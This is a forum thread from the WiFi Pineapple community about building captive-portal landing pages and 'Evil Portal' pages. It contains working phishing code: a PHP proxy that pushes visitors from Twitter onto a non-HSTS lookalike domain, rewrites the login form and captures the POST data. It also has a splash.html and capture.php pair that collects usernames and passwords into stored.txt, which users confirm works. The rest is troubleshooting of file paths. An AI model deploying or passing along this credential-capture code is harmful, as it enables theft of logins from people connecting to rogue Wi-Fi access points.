Landing Page / Evil Portal - Capture data

[meatball]

Hey guys, I've ran into a bit of trouble, could some kind soul help me out please?
I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php"

Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data:

<?php 
if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") )
{
	/* If not visiting twitter, redirect to non-HSTS twitter domain */
	die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); 
} else { 

	/* form posts to http://twitter.co.uk/sessions  */
	if(strstr($_SERVER['REQUEST_URI'], "/sessions")) 
	{   
                /* var_dump($_POST) returns an empty array, should print login data */
		var_dump($_POST); die(); 
	}
	
	/* Curl the site */
	$curl = curl_init();
	curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
	curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); 

	$result = curl_exec($curl);
	$result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result);  /* changes the form action */
	$result = str_replace('<script', "<div style='display:none'><!--", $result);  
	$result = str_replace('</script', "--></div", $result);  			

	echo $result;
}
?>

if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.

[meatball]

Nevermind, fixed it by adding a redirect to index.php before letting the 404 error redirect in /etc/nginx/nginx.conf, I should've thought of that before making this thread!

[b0N3z]

Im making an html page for the landing page but im wondering where to put the folder for the page and how to reference it.

im making a music page that when connected to the pineapple wifi connection you can get directed to the landing page and listen to the music.

[Whistle Master]

You can put all the files in /www/ with an index.php as landing page.

Edited March 2, 2016 by Whistle Master

[b0N3z]

thank you sir

[kingoddball]

Hi Again!

So far it's been fun learning how all this works!

I'm stuck on Evil AP - I copied the guide from https://forums.hak5.org/index.php?/topic/33554-support-evil-portal/and made the landing page/splash.html and made the capture.php but nothing is logged.

I just used copy/paste and also used the YouTube video and copied that but still no data is captured.

I'm not sure if EvilAP/Nodog knows that the file is in /www? I didn't see anything about telling EvilAP where anything is? I don't see any config files in NANO version (like what's shown in the Pineapple V version).

If anyone can help, that would be great!!

The code looks correct (copy and paste plus a review) but no "stored.txt" is created, nothing logged.

I'm thinking it's something like nodogsplash cannot see the file in /www? I'm just not sure how or where I can link it? Just a little stuck.

splash.html:

<html>
<head>
<title>$gatewayname Entry</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache">

<script type="text/javascript">

function submitTextToCapture() {

text = document.getElementById("userText").value;

window.location = "http://172.16.42.1/capture.php?text=" + text + "&redir=$authtarget";

}

</script>

</head>
<body bgcolor="#DDDDDD" text="#000000">
<table border="0" cellpadding="2" cellspacing="0" width="100%">
<tr>
<td align=center>
<h2>$gatewayname</h2>
</td>
</tr>
<tr>
<td align=center height="120">

<p>Enter some text to continue</p>

<form id="textForm">

<input type="text" id="userText" placeholder="enter some text" required>
<button type="button" id="button" onclick="submitTextToCapture()">Send Text</button>

</form>

<a href="$authtarget">
<img src="$imagesdir/wifidog.png" width="71" height="49" border="0"
alt="Click to enter" title="Click to enter">
</a>
</td>
</tr>
</table>
</body>
</html>

/www/capture.php:

<?php

$text = $_GET["text"];
$redir = $_GET["redir"];

$file = fopen("stored.txt", "a");
fwrite($file, $text . "\n");
fclose($file);

echo '<script type="text/javascript">window.location = "' . $redir . '"</script$

?>

Edited February 4, 2016 by kingoddball

[sud0nick]

New version of nodogsplash has problems. There is a whole thread dedicated to this and what's being done to fix it. Please search the forums in the future.

https://forums.hak5.org/index.php?/topic/37081-evilportal/

[kingoddball]

Thanks mate,

I saw that thread lastnight. Wasn't really much I saw. I was seeing wp6.sh and stuff and a reference to firmware issue - Didn't see an actual issue.

So a side, if search was used what am I looking for?

Doesn't seem like a straight issue, could be PHP was wrong, config not knowing where *.php is, html is wrong, could have been anything.

Search doesn't really work for me as I came across a whole lot of threads and didn't get too much.

Edit: on top of that, it says there's an issue with firmware - doesn't say what firmware the issue is with, could be 1.0.5 or lower? I don't know the frequency of the release times are. Search doesn't always yield results if there are not definite details.

So... Posting a topic didn't seem all that harmful. Thanks

Edited February 4, 2016 by kingoddball

[jermzz]

Make sure you have permissions to capture.php. Also make sure you create stored.txt. The php appends, so the file must exist, also with write priv. I got this to work, and modified it to work for password / username capture only clicking one submit button. Can post the script later.

[kingoddball]

Thank you very much!!
Greatly appreciated!

Permissions were set, but I did not create the *.txt file!

I did not know php had to modify an existing file.

Also if you can post the script, that would be great!!

Edited February 4, 2016 by kingoddball

[jermzz]

Also your capture.php is going to throw syntax errors at your closing script tag.

[sud0nick]

Thanks mate,

I saw that thread lastnight. Wasn't really much I saw. I was seeing wp6.sh and stuff and a reference to firmware issue - Didn't see an actual issue.

So a side, if search was used what am I looking for?

Doesn't seem like a straight issue, could be PHP was wrong, config not knowing where *.php is, html is wrong, could have been anything.

Search doesn't really work for me as I came across a whole lot of threads and didn't get too much.

Edit: on top of that, it says there's an issue with firmware - doesn't say what firmware the issue is with, could be 1.0.5 or lower? I don't know the frequency of the release times are. Search doesn't always yield results if there are not definite details.

So... Posting a topic didn't seem all that harmful. Thanks

It's literally the main topic within the Evil Portal support thread for the NANO so there really isn't much searching to be done.

The issue is not a firmware issue but a nodogsplash issue. It seems it won't allow the splash.html page to access anything via $imagesdir anymore and I haven't been successful in getting it to access /www. Everything worked fine on the MKV because that was a different version of nodogsplash. Evil Portal is currently being rewritten without nodogsplash so these problems go away. If you find a way to access /www from your splash.html page on the NANO you might want to share it with everyone in the Evil Portal thread.

[jermzz]

code tag totally wasn't working right from my phone earlier...

here's the js / php I was using with evil portal, it uses POST to push username and pass to capture.php and then redir to authtarget. It's not perfect, it makes a nodogsplash token error, but it saves the userdata and authorizes clients to internet. I was gonna fix the error, but I saw that newbie was revamping, so I just stopped using it. Basically I got frustrated I couldn't get anything to work and just took his markV demo portal and built off it to get it to do what I wanted.... Anyway, you'll need to make a stored.txt in /www since the php appends to the file, or it won't work.

in splash.html

<script type="text/javascript">
 
function getUrlVars() {
    var vars = {};
    var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi,    
    function(m,key,value) {
      vars[key] = value;
    });
    return vars;
  }


var fvalsubmit = getUrlVars()["valsubmit"];
if (fvalsubmit == 1) {
  window.location = "$authtarget";

}


    function submitTextToCapture() {
 
      textuser = document.getElementById("userText").value;
      textpswd = document.getElementById("userPass").value;
      text="username-" + textuser + "-password-" + textpswd;	
 

      window.location = "http://172.16.42.1/capture.php?text=" + text + "&redir=$authtarget&valsubmit=1";
 
    }
 
  </script>


 <form id="textForm">
  <p align="center">                                                                                           
   <div style="font-weight:bold;">Enter Username and Password<br>
   <div align="center">
    <input type="text" id="userText" placeholder="Enter your Email" required>
  <input type="password" id="userPass" placeholder="Enter a Password" required><br>
    <button type="button" id="button" onclick="submitTextToCapture()">
    <b>Connect</b></button>
   </div>
  </p>
 </form>

capture.php

<?php


$text = $_GET["text"];
$redir = $_GET["redir"];

$file = fopen("stored.txt", "a");
fwrite($file, $text . "\n");
fclose($file);

echo '<script type="text/javascript">window.location = "' . $redir . '"</script>';

?>

Edited February 5, 2016 by jermzz

[jermzz]

It's literally the main topic within the Evil Portal support thread for the NANO so there really isn't much searching to be done.

The issue is not a firmware issue but a nodogsplash issue. It seems it won't allow the splash.html page to access anything via $imagesdir anymore and I haven't been successful in getting it to access /www. Everything worked fine on the MKV because that was a different version of nodogsplash. Evil Portal is currently being rewritten without nodogsplash so these problems go away. If you find a way to access /www from your splash.html page on the NANO you might want to share it with everyone in the Evil Portal thread.

It's really picky about what commands and how you can access files in /www. Still dunno why this script works, but I can't directly access any pages. I can't even find the nodogsplash config file, its just… not there.. heh.

Edited February 5, 2016 by jermzz

[sud0nick]

It's really picky about what commands and how you can access files in /www. Still dunno why this script works, but I can't directly access any pages. I can't even find the nodogsplash config file, its just… not there.. heh.

Like I said, this topic has been covered in the actual Evil Portal thread. You can't find the config file because the new version of nodogsplash uses UCI and it exists in /etc/config/ (I think).

[kingoddball]

@jermzz: You're code works great!

Logs perfectly! It's a shame I can't get background images to work.

If you end up getting that to would could you post it up also?

THANK YOU!

Edited February 6, 2016 by kingoddball

[jermzz]

Since I can't get css files to load, I just use css style tags in splash.html and that works. But if you put your images in /etc/nodogsplash/htdocs/images you should be able to reference them by just using images/image.png. I get background images to load that way. Don't put them in /www if that's how you're trying. Anyway all moot since it will all be changed soon. You can use this temporarily though.

Edited February 6, 2016 by jermzz

[bolus]

You can put all the files in /etc/www/ with an index.php as landing page.

I don't have /etc/www folder - I assume I create this myself, or should it be present by default?

[MarcSThe1st]

isn't it in /www ?!?

[b0N3z]

yes it is just /www if you put the cabinet module on your NANO it should be in the home directory at the very top

[bolus]

The changes I make (via my Nano front end) to the landing page are saved into /etc/pineapple/landingpage.php

This is the page that I see when I connect to PineAP with my phone. the images and other php files that my landing page uses are called from /www/

so, it's all working, but is the landing page being stored in the correct location?

[cyberbitz]

I am attempting to set up the landing page, everything seems to work however except upon connecting to the access point the client does not receive the captive portal landing page. In addition upon restarting the nano the state of the portal is not saved and there is not an option like the PineAP to save start config. I also tried the EvilPortal Module with different results. The EvilPortal does not load correctly (some php scripts - the same as landing page) and the client does not receive that page upon connecting.

I had this working once, but something changed. I reset the device and formatted the SD card and that did not fix it.

Looking for some troubleshooting steps.

Thanks,

Tom

[cyberbitz]

Ok, I reset again and only set some basic configurations and it seems to work. I will try to replicate it over time, there is something that changes either after loading modules or rebooting.

[MarcSThe1st]

Hi cyberbitz,

please check in the Module Section for Evil Portal as it is noth working correctly with PHP and some stuff like Images, as the whole module needs to be reworked an Newbi is quite busy at the moment.

https://forums.hak5.org/index.php?/topic/37081-evilportal/

[MarcSThe1st]

Hey folks,

can anybody tell me why we need a landing page (@ /etc/pineapple/landingpage.php)?

I mean why isn't it editing the index.php in /www/index.php? All ported modules are working with the index.php.

So I don't see any benefit to route the trafic to /etc/pineapple/landingpage.php (and then into /www/) instead /www/index.php like it was in the past.

Thanks.